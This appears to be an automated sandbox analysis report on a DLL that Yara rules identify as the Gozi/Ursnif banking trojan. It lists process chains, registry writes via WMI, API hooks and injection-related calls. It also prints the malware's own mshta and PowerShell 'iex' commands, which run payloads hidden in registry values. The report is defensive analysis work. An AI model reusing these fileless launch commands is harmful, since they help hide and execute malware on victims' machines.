Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00401AD1 NtMapViewOfSection,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00401C22 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004023C5 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B87AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B77E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B86CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8CD7A NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7AA15 NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B840A7 memset,NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B77878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B9298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B81606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B737E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B84C67 NtGetContextThread,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B79DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B745FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B79781 CreateProcessAsUserW,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004021A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B762FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7E384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B88BF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B848AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7D0DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8D057
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B97188
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B93EAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8D7BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B74C03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8ED4B

Source: oywbpzxb.dll.31.dr	Static PE information: No import functions for PE file found
Source: augdh01w.dll.36.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Source: sup11_dump.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY

Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@31/158@17/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B7A7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E9735B9C-6051-11EB-90E6-ECF4BB82F7E0}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D63034A3-3DB2-784E-776A-C12C9B3E8520}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{EA68EA5E-4183-AC83-1BBE-05A07FD209D4}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DF2DD4708DD02ECB8C.TMP

Jump to behavior

Source: sup11_dump.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: sup11_dump.dll

Virustotal: Detection: 45%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\sup11_dump.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001F.00000002.419574555.000001D4F2870000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.428776969.0000026A53A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B75BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00402140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00402193 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B97177 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B96E10 push ecx; ret

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
